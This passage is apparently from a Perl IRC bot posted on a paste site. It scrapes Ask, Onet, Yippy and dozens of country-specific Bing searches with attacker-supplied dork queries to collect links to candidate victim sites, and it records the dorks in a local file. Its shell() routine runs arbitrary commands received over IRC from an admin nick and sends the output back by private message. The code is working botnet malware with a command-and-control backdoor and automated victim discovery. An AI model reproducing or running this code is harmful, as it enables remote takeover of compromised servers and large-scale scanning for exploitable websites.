  2817. my $res = &search_engine_query($search);
  2818. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2819. my $link = $1;
  2820. if ($link !~ /askMX\.com/){
  2821. my @grep = links($link);
  2822. push(@list,@grep);
  2823. }
  2824. }
  2825. }
  2826. return @list;
  2827. }
  2828. sleep(4);
  2829. sub askJP() {
  2830. my @list;
  2831. my $key = $_[0];
  2832. for (my $i=1; $i<=100; $i+=1) {
  2833. my $search = ("http://jp.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  2834. my $res = &search_engine_query($search);
  2835. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  2836. my $link = $1;
  2837. if ($link !~ /askJP\.com/){
  2838. my @grep = links($link);
  2839. push(@list,@grep);
  2840. }
  2841. }
  2842. }
  2843. return @list;
  2844. }
  2845.  
  2846. sub onet() {
  2847. my @list;
  2848. my $key = $_[0];
  2849. my $b = 0;
  2850. for ($b=1; $b<=400; $b+=10) {
  2851. my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".uri_escape($key));
  2852. my $res = &search_engine_query($search);
  2853. while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) {
  2854. my $link = $1;
  2855. if ($link !~ /onet|webcache|query/){
  2856. my @grep = &links($link);
  2857. push(@list,@grep);
  2858. }
  2859. }
  2860. }
  2861. return @list;
  2862. }
  2863.  
  2864. sub clusty() {
  2865. my @list;
  2866. my $key = $_[0];
  2867. my $b = 0;
  2868. for ($b=10; $b<=200; $b+=10) {
  2869. my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v%3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state=root|root-".$b."-20|0&");
  2870. my $res = &search_engine_query($search);
  2871. if ($res !~ /next/) {$b=100;}
  2872. while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
  2873. my $link = $1;
  2874. if ($1 !~ /yippy\.com/){
  2875. my @grep = &links($link);
  2876. push(@list,@grep);
  2877. }
  2878. }
  2879. }
  2880. return @list;
  2881. }
  2882.  
  2883. sub bing() {
  2884. my @list;
  2885. my $key = $_[0];
  2886. for (my $i=1; $i<=400; $i+=10) {
  2887. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=".$i);
  2888. my $res = &search_engine_query($search);
  2889. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  2890. my $link = $1;
  2891. if ($link !~ /google/) {
  2892. my @grep = &links($link);
  2893. push(@list,@grep);
  2894. }
  2895. }
  2896. }
  2897. return @list;
  2898. }
  2899.  
  2900. sub bingDE() {
  2901. my @list;
  2902. my $key = $_[0];
  2903. for (my $i=1; $i<=1000; $i+=10) {
  2904. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=de&rf=1&first=".$i."&FORM=PORE");
  2905. my $res = &search_engine_query($search);
  2906. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  2907. my $link = $1;
  2908. if ($link !~ /msn|live|bingDE/) {
  2909. my @grep = links($link);
  2910. push(@list,@grep);
  2911. }
  2912. }
  2913. }
  2914. return @list;
  2915. }
  2916. sleep(4);
  2917. sub bingUK() {
  2918. my @list;
  2919. my $key = $_[0];
  2920. for (my $i=1; $i<=1000; $i+=10) {
  2921. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=uk&rf=1&first=".$i."&FORM=PORE");
  2922. my $res = &search_engine_query($search);
  2923. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  2924. my $link = $1;
  2925. if ($link !~ /msn|live|bingUK/) {
  2926. my @grep = links($link);
  2927. push(@list,@grep);
  2928. }
  2929. }
  2930. }
  2931. return @list;
  2932. }
  2933.  
  2934. sub bingCA() {
  2935. my @list;
  2936. my $key = $_[0];
  2937. for (my $i=1; $i<=1000; $i+=10) {
  2938. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ca&rf=1&first=".$i."&FORM=PORE");
  2939. my $res = &search_engine_query($search);
  2940. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  2941. my $link = $1;
  2942. if ($link !~ /msn|live|bingCA/) {
  2943. my @grep = links($link);
  2944. push(@list,@grep);
  2945. }
  2946. }
  2947. }
  2948. return @list;
  2949. }
  2950.  
  2951. sub bingBR() {
  2952. my @list;
  2953. my $key = $_[0];
  2954. for (my $i=1; $i<=1000; $i+=10) {
  2955. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=br&rf=1&first=".$i."&FORM=PORE");
  2956. my $res = &search_engine_query($search);
  2957. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  2958. my $link = $1;
  2959. if ($link !~ /msn|live|bingBR/) {
  2960. my @grep = links($link);
  2961. push(@list,@grep);
  2962. }
  2963. }
  2964. }
  2965. return @list;
  2966. }
  2967.  
  2968. sub bingFR() {
  2969. my @list;
  2970. my $key = $_[0];
  2971. for (my $i=1; $i<=1000; $i+=10) {
  2972. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=fr&rf=1&first=".$i."&FORM=PORE");
  2973. my $res = &search_engine_query($search);
  2974. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  2975. my $link = $1;
  2976. if ($link !~ /msn|live|bingFR/) {
  2977. my @grep = links($link);
  2978. push(@list,@grep);
  2979. }
  2980. }
  2981. }
  2982. return @list;
  2983. }
  2984.  
  2985. sub bingES() {
  2986. my @list;
  2987. my $key = $_[0];
  2988. for (my $i=1; $i<=1000; $i+=10) {
  2989. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=es&rf=1&first=".$i."&FORM=PORE");
  2990. my $res = &search_engine_query($search);
  2991. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  2992. my $link = $1;
  2993. if ($link !~ /msn|live|bingES/) {
  2994. my @grep = links($link);
  2995. push(@list,@grep);
  2996. }
  2997. }
  2998. }
  2999. return @list;
  3000. }
  3001.  
  3002. sub bingIT() {
  3003. my @list;
  3004. my $key = $_[0];
  3005. for (my $i=1; $i<=1000; $i+=10) {
  3006. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=it&rf=1&first=".$i."&FORM=PORE");
  3007. my $res = &search_engine_query($search);
  3008. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  3009. my $link = $1;
  3010. if ($link !~ /msn|live|bingIT/) {
  3011. my @grep = links($link);
  3012. push(@list,@grep);
  3013. }
  3014. }
  3015. }
  3016. return @list;
  3017. }
  3018. sleep(4);
  3019. sub bingBE() {
  3020. my @list;
  3021. my $key = $_[0];
  3022. for (my $i=1; $i<=1000; $i+=10) {
  3023. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=be&rf=1&first=".$i."&FORM=PORE");
  3024. my $res = &search_engine_query($search);
  3025. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  3026. my $link = $1;
  3027. if ($link !~ /msn|live|bingBE/) {
  3028. my @grep = links($link);
  3029. push(@list,@grep);
  3030. }
  3031. }
  3032. }
  3033. return @list;
  3034. }
  3035.  
  3036. sub bingNL() {
  3037. my @list;
  3038. my $key = $_[0];
  3039. for (my $i=1; $i<=1000; $i+=10) {
  3040. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=nl&rf=1&first=".$i."&FORM=PORE");
  3041. my $res = &search_engine_query($search);
  3042. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  3043. my $link = $1;
  3044. if ($link !~ /msn|live|bingNL/) {
  3045. my @grep = links($link);
  3046. push(@list,@grep);
  3047. }
  3048. }
  3049. }
  3050. return @list;
  3051. }
  3052.  
  3053. sub bingPT() {
  3054. my @list;
  3055. my $key = $_[0];
  3056. for (my $i=1; $i<=1000; $i+=10) {
  3057. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=pt&rf=1&first=".$i."&FORM=PORE");
  3058. my $res = &search_engine_query($search);
  3059. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  3060. my $link = $1;
  3061. if ($link !~ /msn|live|bingPT/) {
  3062. my @grep = links($link);
  3063. push(@list,@grep);
  3064. }
  3065. }
  3066. }
  3067. return @list;
  3068. }
  3069.  
  3070. sub bingNO() {
  3071. my @list;
  3072. my $key = $_[0];
  3073. for (my $i=1; $i<=1000; $i+=10) {
  3074. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=no&rf=1&first=".$i."&FORM=PORE");
  3075. my $res = &search_engine_query($search);
  3076. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  3077. my $link = $1;
  3078. if ($link !~ /msn|live|bingNO/) {
  3079. my @grep = links($link);
  3080. push(@list,@grep);
  3081. }
  3082. }
  3083. }
  3084. return @list;
  3085. }
  3086.  
  3087. sub bingDK() {
  3088. my @list;
  3089. my $key = $_[0];
  3090. for (my $i=1; $i<=1000; $i+=10) {
  3091. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=dk&rf=1&first=".$i."&FORM=PORE");
  3092. my $res = &search_engine_query($search);
  3093. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  3094. my $link = $1;
  3095. if ($link !~ /msn|live|bingDK/) {
  3096. my @grep = links($link);
  3097. push(@list,@grep);
  3098. }
  3099. }
  3100. }
  3101. return @list;
  3102. }
  3103.  
  3104. sub bingSE() {
  3105. my @list;
  3106. my $key = $_[0];
  3107. for (my $i=1; $i<=1000; $i+=10) {
  3108. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=se&rf=1&first=".$i."&FORM=PORE");
  3109. my $res = &search_engine_query($search);
  3110. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  3111. my $link = $1;
  3112. if ($link !~ /msn|live|bingSE/) {
  3113. my @grep = links($link);
  3114. push(@list,@grep);
  3115. }
  3116. }
  3117. }
  3118. return @list;
  3119. }
  3120. sleep(4);
  3121. sub bingCH() {
  3122. my @list;
  3123. my $key = $_[0];
  3124. for (my $i=1; $i<=1000; $i+=10) {
  3125. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ch&rf=1&first=".$i."&FORM=PORE");
  3126. my $res = &search_engine_query($search);
  3127. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  3128. my $link = $1;
  3129. if ($link !~ /msn|live|bingCH/) {
  3130. my @grep = links($link);
  3131. push(@list,@grep);
  3132. }
  3133. }
  3134. }
  3135. return @list;
  3136. }
  3137.  
  3138. sub bingNZ() {
  3139. my @list;
  3140. my $key = $_[0];
  3141. for (my $i=1; $i<=1000; $i+=10) {
  3142. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=nz&rf=1&first=".$i."&FORM=PORE");
  3143. my $res = &search_engine_query($search);
  3144. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  3145. my $link = $1;
  3146. if ($link !~ /msn|live|bingNZ/) {
  3147. my @grep = links($link);
  3148. push(@list,@grep);
  3149. }
  3150. }
  3151. }
  3152. return @list;
  3153. }
  3154.  
  3155. sub bingRU() {
  3156. my @list;
  3157. my $key = $_[0];
  3158. for (my $i=1; $i<=1000; $i+=10) {
  3159. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ru&rf=1&first=".$i."&FORM=PORE");
  3160. my $res = &search_engine_query($search);
  3161. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  3162. my $link = $1;
  3163. if ($link !~ /msn|live|bingRU/) {
  3164. my @grep = links($link);
  3165. push(@list,@grep);
  3166. }
  3167. }
  3168. }
  3169. return @list;
  3170. }
  3171.  
  3172. sub bingJP() {
  3173. my @list;
  3174. my $key = $_[0];
  3175. for (my $i=1; $i<=1000; $i+=10) {
  3176. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=jp&rf=1&first=".$i."&FORM=PORE");
  3177. my $res = &search_engine_query($search);
  3178. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  3179. my $link = $1;
  3180. if ($link !~ /msn|live|bingJP/) {
  3181. my @grep = links($link);
  3182. push(@list,@grep);
  3183. }
  3184. }
  3185. }
  3186. return @list;
  3187. }
  3188.  
  3189. sub bingCN() {
  3190. my @list;
  3191. my $key = $_[0];
  3192. for (my $i=1; $i<=1000; $i+=10) {
  3193. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=cn&rf=1&first=".$i."&FORM=PORE");
  3194. my $res = &search_engine_query($search);
  3195. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  3196. my $link = $1;
  3197. if ($link !~ /msn|live|bingCN/) {
  3198. my @grep = links($link);
  3199. push(@list,@grep);
  3200. }
  3201. }
  3202. }
  3203. return @list;
  3204. }
  3205.  
  3206. sub bingKR() {
  3207. my @list;
  3208. my $key = $_[0];
  3209. for (my $i=1; $i<=1000; $i+=10) {
  3210. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=kr&rf=1&first=".$i."&FORM=PORE");
  3211. my $res = &search_engine_query($search);
  3212. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  3213. my $link = $1;
  3214. if ($link !~ /msn|live|bingKR/) {
  3215. my @grep = links($link);
  3216. push(@list,@grep);
  3217. }
  3218. }
  3219. }
  3220. return @list;
  3221. }
  3222. sleep(4);
  3223. sub bingMX() {
  3224. my @list;
  3225. my $key = $_[0];
  3226. for (my $i=1; $i<=1000; $i+=10) {
  3227. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=mx&rf=1&first=".$i."&FORM=PORE");
  3228. my $res = &search_engine_query($search);
  3229. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  3230. my $link = $1;
  3231. if ($link !~ /msn|live|bingMX/) {
  3232. my @grep = links($link);
  3233. push(@list,@grep);
  3234. }
  3235. }
  3236. }
  3237. return @list;
  3238. }
  3239.  
  3240. sub bingAR() {
  3241. my @list;
  3242. my $key = $_[0];
  3243. for (my $i=1; $i<=1000; $i+=10) {
  3244. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ar&rf=1&first=".$i."&FORM=PORE");
  3245. my $res = &search_engine_query($search);
  3246. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  3247. my $link = $1;
  3248. if ($link !~ /msn|live|bingAR/) {
  3249. my @grep = links($link);
  3250. push(@list,@grep);
  3251. }
  3252. }
  3253. }
  3254. return @list;
  3255. }
  3256.  
  3257. sub bingCL() {
  3258. my @list;
  3259. my $key = $_[0];
  3260. for (my $i=1; $i<=1000; $i+=10) {
  3261. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=cl&rf=1&first=".$i."&FORM=PORE");
  3262. my $res = &search_engine_query($search);
  3263. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  3264. my $link = $1;
  3265. if ($link !~ /msn|live|bingCL/) {
  3266. my @grep = links($link);
  3267. push(@list,@grep);
  3268. }
  3269. }
  3270. }
  3271. return @list;
  3272. }
  3273.  
  3274. sub bingAU() {
  3275. my @list;
  3276. my $key = $_[0];
  3277. for (my $i=1; $i<=1000; $i+=10) {
  3278. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=au&rf=1&first=".$i."&FORM=PORE");
  3279. my $res = &search_engine_query($search);
  3280. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  3281. my $link = $1;
  3282. if ($link !~ /msn|live|bingAU/) {
  3283. my @grep = links($link);
  3284. push(@list,@grep);
  3285. }
  3286. }
  3287. }
  3288. return @list;
  3289. }
  3290. #########################################
  3291.  
  3292. sub clean() {
  3293. my @cln = ();
  3294. my %visit = ();
  3295. foreach my $element (@_) {
  3296. $element =~ s/\/+/\//g;
  3297. next if $visit{$element}++;
  3298. push @cln, $element;
  3299. }
  3300. return @cln;
  3301. }
  3302.  
  3303. sub key() {
  3304. my $dork = $_[0];
  3305. $dork =~ s/ /\+/g;
  3306. $dork =~ s/:/\%3A/g;
  3307. $dork =~ s/\//\%2F/g;
  3308. $dork =~ s/\?/\%3F/g;
  3309. $dork =~ s/&/\%26/g;
  3310. $dork =~ s/\"/\%22/g;
  3311. $dork =~ s/,/\%2C/g;
  3312. $dork =~ s/\\/\%5C/g;
  3313. $dork =~ s/@/\%40/g;
  3314. $dork =~ s/\[/\%5B/g;
  3315. $dork =~ s/\]/\%5D/g;
  3316. $dork =~ s/\?/\%3F/g;
  3317. $dork =~ s/\=/\%3D/g;
  3318. $dork =~ s/\|/\%7C/g;
  3319. return $dork;
  3320. }
  3321.  
  3322. sub links() {
  3323. my @list;
  3324. my $link = $_[0];
  3325. my $host = $_[0];
  3326. my $hdir = $_[0];
  3327. $hdir =~ s/(.*)\/[^\/]*$/\1/;
  3328. $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  3329. $host .= "/";
  3330. $link .= "/";
  3331. $hdir .= "/";
  3332. $host =~ s/\/\//\//g;
  3333. $hdir =~ s/\/\//\//g;
  3334. $link =~ s/\/\//\//g;
  3335. push(@list,$link,$host,$hdir);
  3336. return @list;
  3337. }
  3338.  
  3339. sub search_engine_query() {
  3340. my $url = $_[0];
  3341. $url =~ s/http:\/\///;
  3342. my $host = $url;
  3343. my $query = $url;
  3344. my $page = "";
  3345. $host =~ s/href=\"?http:\/\///;
  3346. $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  3347. $query =~ s/$host//;
  3348. if ($query eq "") { $query = "/"; }
  3349. eval {
  3350. my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
  3351. print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
  3352. my @pages = <$sock>;
  3353. $page = "@pages";
  3354. close($sock);
  3355. };
  3356. return $page;
  3357. }
  3358.  
  3359. #########################################
  3360.  
  3361. sub shell() {
  3362. my $path = $_[0];
  3363. my $cmd = $_[1];
  3364. if ($cmd =~ /cd (.*)/) {
  3365. chdir("$1") || &msg("$path","No such file or directory");
  3366. return;
  3367. }
  3368. elsif ($pid = fork) { waitpid($pid, 0); }
  3369. else { if (fork) { exit; } else {
  3370. my @output = `$cmd 2>&1 3>&1`;
  3371. my $c = 0;
  3372. foreach my $output (@output) {
  3373. $c++;
  3374. chop $output;
  3375. &msg("$path","$output");
  3376. if ($c == 5) { $c = 0; sleep 3; }
  3377. }
  3378. exit;
  3379. }}
  3380. }
  3381.  
  3382. sub isAdmin() {
  3383. my $status = 0;
  3384. my $nick = $_[0];
  3385. if ($nick eq $admin) { $status = 1; }
  3386. return $status;
  3387. }
  3388.  
  3389. sub msg() {
  3390. return unless $#_ == 1;
  3391. sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");
  3392. }
  3393.  
  3394. sub nick() {
  3395. return unless $#_ == 0;
  3396. sendraw("NICK $_[0]");
  3397. }
  3398.  
  3399. sub notice() {
  3400. return unless $#_ == 1;
  3401. sendraw("NOTICE $_[0] :$_[1]");
  3402. }
  3403.  
  3404. sub read_dorks() {
  3405. my $dork = uri_escape($_[0]);
  3406. my $file = "dorks.txt";
  3407. my $success = 0;
  3408. open (file,"<$file");
  3409. while (my $dorkx=<file>) {
  3410. chop($dorkx);
  3411. if ($dorkx =~ /$dork/){
  3412. $success = 1;
  3413. }
  3414. }
  3415. close file;
  3416. return $success;
  3417. }
  3418.  
  3419. sub write_dorks() {
  3420. my $dorks = uri_escape($_[0]);
  3421. my $file = "dorks.txt";
  3422. open (filex,">>$file");
  3423. print filex $dorks."\n";
  3424. close filex;
  3425. }
Add Comment
Please, Sign In to add comment